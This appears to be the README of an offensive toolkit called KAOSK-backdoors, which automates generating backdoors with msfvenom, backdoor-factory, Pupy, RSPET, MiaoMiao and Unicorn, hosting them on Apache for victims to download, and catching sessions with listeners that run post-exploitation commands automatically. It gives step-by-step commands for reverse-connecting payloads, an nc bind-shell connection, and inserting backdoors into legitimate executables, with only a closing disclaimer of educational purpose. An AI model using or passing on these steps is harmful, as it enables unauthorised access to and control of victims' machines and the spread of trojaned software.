It's a tool that automates:
- The installation of some Backdoor's creation programs
- The creation of the backdoors to use in a victim machine
- Start running an Apache where you can download the backdoors created
- The starting of he listener of the backdoors downloaded
- The actions to execute when a victim if connected to the listener
Using Kali2 as the attacker with IP: 192.168.0.100
Using any machine as the victim in the same network as the attacker.
Run in Kali:
git clone https://github.com/carlospolop/KAOSK-backdoors.git
cd ./KAOSK-backdoors
python ./install.py
python ./create_backdoors.py 192.168.0.100
python ./handler.py 192.168.0.100
In the victim machine:
Use a browser and navigate to 192.168.0.100/back and you will see the backdoors created before in the attacker machine. Download the backdoor that you want to use.
Run the backdoor downloaded in the victim machine.
You will have a session of the victim's machine in Kali.
If you had chosen a backdoor created using msfvenom, backdoor-factory or unicorn, you will have a metasploit session of the victim. The metasploit's sessions can be configured to automatically run post modules, meterpreter commands and shell commands in the config folder. This means that when you capture a metasploit sessions this modules and commands will run automatically.
You can select which metasploit payloads to use in the document called payloads.txt in the config folder.
Te sintax is: PAYLOAD PORT
You just have to go to the config folder and there you will find some folders of differents OS. Go inside anyone and you will find some text documents where you can write which post modules, meterpreters commands and shell commands run when you capture a session in a machine that uses the OS selected.
- Python
- Metasploit
- Backdoor-factory
- Apache2
KAOSK has been tested in Kali2.
python ./install.py
python ./create_backdoors.py IP_attacker
python ./handler.py IP_attacker
- Backdoor-factoy
- MiaoMiao
- Msfvenom
- Pupy
- RSPET
- Unicorn
The backdoor-factory introduces the backdoors inside executables.
If you want to corrupt a executable, you just have to download the original, move it to the correct folder inside ./BDF_prepared and run python ./create_backdoors.py IP_attacker (or python ./backdoor-factoryAuto.py IP_attacker)
https://github.com/secretsquirrel/the-backdoor-factory.git
This backdoor opens a port in the victims machine and the attacker connects to it. The default port is 55555 To use this backdoor you have to run:
- Victim: Run MiaoMiamo_folder/src_backdoor/server_dist/newest_version
- Attacker: nc IP_Victim 55555 -vv
https://github.com/marc0l92/MiaoMiao_project.git
Of course.
Creates differents types of backdoors and use it's own listener. It is all automated and the process followed to use these backdoors is:
- Victim: Run the file create using ./pupygen.py -f lin_x64 connect --host IP_Attacker
- Attacker: ./pupysh.py
https://github.com/n1nj4sec/pupy.git
To use this backdoor you have to run:
- Victim: Run python RSPET_folder/Client/rspet_client.py IP_Attacker
- Attacker: (This part is automated) Run Server > rspet_server.py
https://github.com/panagiks/RSPET.git
Creates differents types of backdoors and it is all automated. Uses metasploit as listener.
https://github.com/n1nj4sec/pupy.git
The owner of this software made it with educational and didactic purposes and is not responsable of the use of it.